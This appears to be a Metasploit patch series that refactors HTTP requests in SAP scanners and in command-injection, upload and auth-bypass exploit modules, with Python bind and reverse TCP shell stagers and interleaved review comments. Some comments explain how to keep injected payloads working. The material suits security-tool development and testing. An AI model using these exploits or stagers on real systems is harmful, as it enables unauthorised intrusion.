b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -94,14 +94,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res 
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index ec95f65519..be20e21b59 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -62,17 +62,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_PING request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + client + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + client, + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}", 'data' => data, 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => client, + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 if res and res.body =~ /

Logon failed<\/h1>/ print_error("[SAP] #{ip}:#{rport} - login failed!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index d7e7ad065b..3d19045911 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -83,19 +83,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_READ_TABLE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'ctype' => 'text/xml; charset=UTF-8', - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - #'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], - #'Authorization' => 'Basic ' + user_pass, - #'Content-Type' => - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. if res.body =~ /

Logon failed<\/h1>/ diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index f60e420352..d8f0f2ba23 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -70,17 +70,20 @@ class Metasploit4 < Msf::Auxiliary begin vprint_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['ABAP_USER']}' with password '#{datastore['ABAP_PASSWORD']}'") res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' => - { - 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' - } - }) + 'headers' => { + 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions' + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code == 200 if res.body =~ /

Logon failed<\/h1>/ vprint_error("[SAP] #{ip}:#{rport} - Logon failed") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index bab5a4f4c7..33c040c8ac 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -73,16 +73,20 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', - } - }) + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' + } + }) if res and res.code != 500 and res.code != 200 # to do - implement error handlers for each status code, 404, 301, etc. print_error("[SAP] #{ip}:#{rport} - something went wrong!") diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 977001c395..7b2aad3ebe 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb 
@@ -73,14 +73,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 0677878b96..db2a26bf6e 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -89,14 +89,18 @@ class Metasploit4 < Msf::Auxiliary print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request") begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' =>{ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code != 500 and res.code != 200 
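Review bot: In the sap_soap_rfc_sxpg_command_exec.rb and sap_soap_rfc_system_info.rb hunks the `'headers' =>{` line is left untouched, while the sibling SAP modules rewritten in this same commit normalise it to `'headers' => {`. Since the hash literal is being restructured anyway, `'headers' => {` keeps the dozen modules consistent and matches the `'vars_get' => {` line added right below it. No behaviour change is involved.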
diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index d02719355c..4695780832 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -64,14 +64,18 @@ class Metasploit4 < Msf::Auxiliary begin res = send_request_cgi({ - 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN', + 'uri' => '/sap/bc/soap/rfc', 'method' => 'POST', 'data' => data, - 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'], + 'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}", 'ctype' => 'text/xml; charset=UTF-8', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'headers' =>{ + 'headers' => { 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions', + }, + 'vars_get' => { + 'sap-client' => datastore['CLIENT'], + 'sap-language' => 'EN' } }) if res and res.code == 200 diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index b1542c492e..d979506f7a 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -103,8 +103,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/admin/system.html?step=2&device=lo#{cmd}", - 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'uri' => '/admin/system.html', + 'cookie' => "usercookie=#{user}; passcookie=#{pass};", + 'vars_get' => { + 'step' => '2', + 'device' => "lo#{cmd}" + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unknown, 'Connection failed') 
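Review bot: `'device' => "lo#{cmd}"` in openfiler_networkcard_exec.rb now goes through the client's `vars_get` encoding, which is on by default via `encode_params`, whereas the old `"/admin/system.html?step=2&device=lo#{cmd}"` string was sent untouched. `cmd` is built outside the hunk; if it is already passed through `Rex::Text.uri_encode` there, it will be double-encoded (`%` becomes `%25`) and the injection silently stops working. Check where `cmd` is assembled and either leave it unencoded or add `'encode_params' => false` to the request options, with a comment on the `vars_get` line saying which of the two is relied on.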
diff --git a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb index ffc6163100..3da916023f 100644 --- a/modules/exploits/linux/http/sophos_wpa_iface_exec.rb +++ b/modules/exploits/linux/http/sophos_wpa_iface_exec.rb @@ -100,9 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Authenticating as " + datastore['USERNAME']) login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/ @@ -134,9 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Changing old password hash to notpassword") passchange = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'), + 'uri' => normalize_uri(target_uri.path, '/index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'change_password' + } }) if !passchange or passchange.code != 200 @@ -166,9 +172,12 @@ class Metasploit3 < Msf::Exploit::Remote } login = send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=login'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', - 'vars_post' => post + 'vars_post' => post, + 'vars_get' => { + 'c' => 'login', + } }) if !login or login.code != 200 or login.body !~ /admin<\/a>/ @@ -192,9 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending payload") send_request_cgi({ - 'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'), + 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => post, + 'vars_get' => { + 'c' => 'netinterface', + } }) end end 
diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 96e02f8cbf..71901569d9 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -88,7 +88,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit user = datastore['USERNAME'] pass = datastore['PASSWORD'] - auth = Rex::Text.encode_base64("#{user}:#{pass}") cmd = Rex::Text.uri_encode(";#{payload.encoded}&") lines = rand(100) + 1 @@ -96,11 +95,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)") begin res = send_request_cgi({ - 'uri' => "/index.cgi?nlines=#{lines}&action=See+logs&id=2-2&filelog=#{cmd}", - 'headers' => - { - 'Authorization' => "Basic #{auth}" - } + 'uri' => '/index.cgi', + 'authorization' => basic_auth(user, pass), + 'vars_get' => { + 'nlines' => lines, + 'action' => 'See logs', + 'id' => '2-2', + 'filelog' => cmd + } }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, 'Connection failed') diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 19c9a442ed..597af3a40a 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb 
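Review bot: `'filelog' => cmd` in the second zen_load_balancer_exec.rb hunk double-encodes the payload: `cmd` is built with `Rex::Text.uri_encode(";#{payload.encoded}&")` in the first hunk, and `send_request_cgi` percent-encodes `vars_get` values again when `encode_params` is at its default, so the `%3B` the target used to receive becomes `%253B` and the command separator never reaches the shell. Either drop the pre-encoding, `cmd = ";#{payload.encoded}&"`, and let the client encode once, or pass `'encode_params' => false` alongside `vars_get`. The old raw-URI form did not have this problem, so this is a regression introduced by the msftidy clean-up rather than a pre-existing one.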
@@ -63,13 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote @cookie = "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "j_spring_security_check?org.apache.catalina.filters.CSRF_NONCE="), + 'uri' => normalize_uri(@uri.path, 'j_spring_security_check'), 'method' => 'POST', 'cookie' => @cookie, 'vars_post' => { 'j_username' => Rex::Text.uri_encode(user, 'hex-normal'), 'j_password' => Rex::Text.uri_encode(pass, 'hex-normal'), 'submit' => 'Sign+in' + }, + 'vars_get' => { + 'org.apache.catalina.filters.CSRF_NONCE' => '' } }) @@ -81,8 +84,11 @@ class Metasploit3 < Msf::Exploit::Remote # def get_nonce res = send_request_cgi({ - 'uri' => normalize_uri(@uri.path, "mastheadAttach.do?typeId=10003"), - 'cookie' => @cookie + 'uri' => normalize_uri(@uri.path, 'mastheadAttach.do'), + 'cookie' => @cookie, + 'vars_get' => { + 'typeId' => '10003' + } }) if not res or res.code != 200 diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index bc346979d8..874e681659 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -181,15 +181,17 @@ class Metasploit3 < Msf::Exploit::Remote data << "\r\n--#{boundary}--" res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"), + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), 'method' => 'POST', 'data' => data, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=' + boundary, - 'Content-Length' => data.length, - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=' + boundary, + 'Content-Length' => data.length, + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'uploadplugin' => nil + } }) 
@@ -199,11 +201,13 @@ class Metasploit3 < Msf::Exploit::Remote if datastore['REMOVE_PLUGIN'] print_status("Deleting plugin #{plugin_name} from the server") res = send_request_cgi({ - 'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase, - 'headers' => - { - 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", - } + 'uri' => normalize_uri(base, 'setup/setup-/../../plugin-admin.jsp'), + 'headers' => { + 'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}", + }, + 'vars_get' => { + 'deleteplugin' => plugin_name.downcase + } }) if not res print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.") diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 9953aa07b0..70988f9cd5 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -64,15 +64,17 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi( { - 'uri' => '/robohelp/server?PUBLISH=' + uid, + 'uri' => '/robohelp/server', 'version' => '1.1', 'method' => 'POST', 'data' => file, - 'headers' => - { - 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, - 'UID' => uid, - } + 'headers' => { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------' + uid, + 'UID' => uid, + }, + 'vars_get' => { + 'PUBLISH' => uid + } }, 5) if ( res and res.message =~ /OK/ ) @@ -80,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...") data = send_request_raw({ - 'uri' => '/robohelp/robo/reserved/web/' + id + '/' + page , + 'uri' => normalize_uri('robohelp', 'robo','reserved', 'web', id, page), 'method' => 'GET', - 'version' => '1.0', + 'version' => '1.0' }, 5) handler 
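Review bot: `normalize_uri('robohelp', 'robo','reserved', 'web', id, page)` in adobe_robohelper_authbypass.rb drops the space after `'robo',` while the rest of the argument list uses `', '`; `normalize_uri('robohelp', 'robo', 'reserved', 'web', id, page)` reads consistently. `id` is taken from the server response outside the hunk and `normalize_uri` does not encode it, which matches the old concatenation, but a short comment that the session id is inserted verbatim would make that deliberate.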
diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index 7ddae4d011..63f07cc9c6 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -46,10 +46,16 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(filename, contents) res = send_request_cgi({ - 'uri' => normalize_uri("agentLogUploader?computerName=DesktopCentral&domainName=webapps&customerId=..&filename=#(unknown)"), - 'method' => 'POST', - 'data' => contents, - 'ctype' => "text/html" + 'uri' => normalize_uri('agentLogUploader'), + 'method' => 'POST', + 'data' => contents, + 'ctype' => 'text/html', + 'vars_get' => { + 'computerName' => 'DesktopCentral', + 'domainName' => 'webapps', + 'customerId' => '..', + 'filename' => filename + } }) if res and res.code == 200 and res.body.to_s.empty? diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 96f1cb3d2a..14471183de 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -83,9 +83,14 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Trying target #{target.name}...") send_request_cgi({ - 'uri' => "/OvCgi/ovalarm.exe?OVABverbose=1", + 'uri' => '/OvCgi/ovalarm.exe', 'method' => "GET", - 'headers' => { 'Accept-Language' => sploit } + 'headers' => { + 'Accept-Language' => sploit + }, + 'vars_get' => { + 'OVABverbose' => '1' + } }, 3) handler diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index 730b89f9a9..0f6fa1e789 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb 
@@ -68,10 +68,13 @@ class Metasploit3 < Msf::Exploit::Remote # Sending the request res = send_request_cgi({ - 'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash, - 'method' => 'GET', - 'headers' => { - 'Accept' => '*/*', + 'uri' => normalize_uri(datastore['DIR'], 'Login.jsp'), + 'method' => 'GET', + 'headers' => { + 'Accept' => '*/*', + }, + 'vars_get' => { + crash => nil } }, 5) diff --git a/modules/exploits/windows/http/zenworks_uploadservlet.rb b/modules/exploits/windows/http/zenworks_uploadservlet.rb index 9d675fec6a..728544b5bc 100644 --- a/modules/exploits/windows/http/zenworks_uploadservlet.rb +++ b/modules/exploits/windows/http/zenworks_uploadservlet.rb @@ -66,16 +66,17 @@ class Metasploit3 < Msf::Exploit::Remote war_data = payload.encoded_war(:app_name => app_base, :jsp_name => jsp_name).to_s - res = send_request_cgi( - { - 'uri' => "/zenworks/UploadServlet?filename=../../webapps/#{app_base}.war", - 'method' => 'POST', - 'data' => war_data, - 'headers' => - { - 'Content-Type' => 'application/octet-stream', - } - }) + res = send_request_cgi({ + 'uri' => '/zenworks/UploadServlet', + 'method' => 'POST', + 'data' => war_data, + 'headers' => { + 'Content-Type' => 'application/octet-stream', + }, + 'vars_get' => { + 'filename' => "../../webapps/#{app_base}.war" + } + }) print_status("Uploading #{war_data.length} bytes as #{app_base}.war ...") diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 64c917fea2..14f13a776d 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -190,6 +190,8 @@ describe Rex::Proto::Http::ClientRequest do 'bar' => 'baz', 'frobnicate' => 'the froozle?', 'foshizzle' => 'my/nizzle', + 'asdf' => nil, + 'test' => '' } end 
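Review bot: `'vars_get' => { crash => nil }` in sybase_easerver.rb makes the crash buffer a parameter *name*, and `send_request_cgi` percent-encodes names as well as values when `encode_params` is at its default, so every byte outside the unreserved set is expanded to three characters; the previous `'/Login.jsp?') + crash` went out untouched. `crash` is assembled before the hunk so I cannot see whether it is all printable, but an overflow trigger is usually length- or content-sensitive and will change under encoding; pass `'encode_params' => false` or keep the raw concatenation, and say so in a comment. The `nil` value also relies on the `ClientRequest` change in this same commit (`uri?parameter` without `=`), which reproduces the old trailing `?` but deserves a comment so the dependency is visible.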
@@ -217,6 +219,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the froozle?") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end @@ -229,6 +233,8 @@ describe Rex::Proto::Http::ClientRequest do str.should include("bar=baz") str.should include("frobnicate=the%20froozle%3f") str.should include("foshizzle=my/nizzle") + str.should include("asdf&") + str.should include("test=") end end From b5c567c4628455a5f15c9eb24c224f0fd07c9f37 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sun, 25 May 2014 14:03:45 -0500 Subject: [PATCH 33/47] Update bind_tcp.rb --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index cd9422023c..50e8974123 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -32,7 +32,7 @@ module Metasploit3 cmd = '' # Set up the socket cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1 + cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" cmd += "s.listen(1)\n" cmd += "c,a=s.accept()\n" From 77f66f8510fc62eb9e5f7a2e85417f7edc1b84ca Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Sun, 25 May 2014 14:04:54 -0500 Subject: [PATCH 34/47] Update reverse_tcp.rb --- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 765dc00f34..4f741f0c52 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb 
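Review bot: The new expectations `str.should include("asdf&")` and `str.should include("test=")` only prove those substrings occur; they do not prove `asdf=` is absent, which is the behaviour the `ClientRequest` change introduces, and `"asdf&"` only holds because another key happens to follow in hash order. Add `str.should_not include("asdf=")` in both the encoded and unencoded contexts, and anchor the empty-string case with `str.should include("test=&")` or an end-of-string check so a regression that re-adds `=` for nil would fail.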
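Review bot: The replacement `s=socket.socket(2,socket.SOCK_STREAM)` in bind_tcp.rb loses the explanation the old comment carried, and the remaining `# socket.AF_INET = 2` does not say why the second argument is no longer a literal. Suggest `# socket.AF_INET = 2 on every common platform; SOCK_STREAM is not a fixed number, so use the constant` so the next size-conscious edit does not put `1` back. The same change is made to reverse_tcp.rb in the following commit and would benefit from the same comment.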
@@ -32,7 +32,7 @@ module Metasploit3 cmd = '' # Set up the socket cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1 + cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" cmd += "l=struct.unpack('>I',s.recv(4))[0]\n" cmd += "d=s.recv(4096)\n" From 77e70d8bbeee1f8199009c12a50f79a342d50311 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sun, 25 May 2014 16:28:40 -0400 Subject: [PATCH 35/47] Add 2 more variables for meterpreter irb --- lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index 6766ce7e7f..28138c8c25 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -314,6 +314,8 @@ class Console::CommandDispatcher::Core print_status("Starting IRB shell") print_status("The 'client' variable holds the meterpreter client\n") + session = client + framework = client.framework Rex::Ui::Text::IrbShell.new(binding).run end From d3c17d8e3e9f27305d3df838603e57df451e0107 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 25 May 2014 18:39:53 -0500 Subject: [PATCH 36/47] Delete wireshark_capwap_dos --- .../dos/wireshark/wireshark_capwap_dos.rb | 69 ------------------- 1 file changed, 69 deletions(-) delete mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb deleted file mode 100644 index 603f5e81ca..0000000000 --- a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb +++ /dev/null 
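Review bot: The new locals `session = client` and `framework = client.framework` in core.rb are assigned but never read inside the hunk; presumably they exist so `binding` exposes them to the IRB shell on the next line, but without a comment they look like dead code and `ruby -w` may report them as unused. Add `# exposed to the IRB session through binding` above them, and extend the status line so users learn they exist: `print_status("The 'client', 'session' and 'framework' variables hold the meterpreter client, session and framework\n")`. The enclosing method begins before the hunk.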
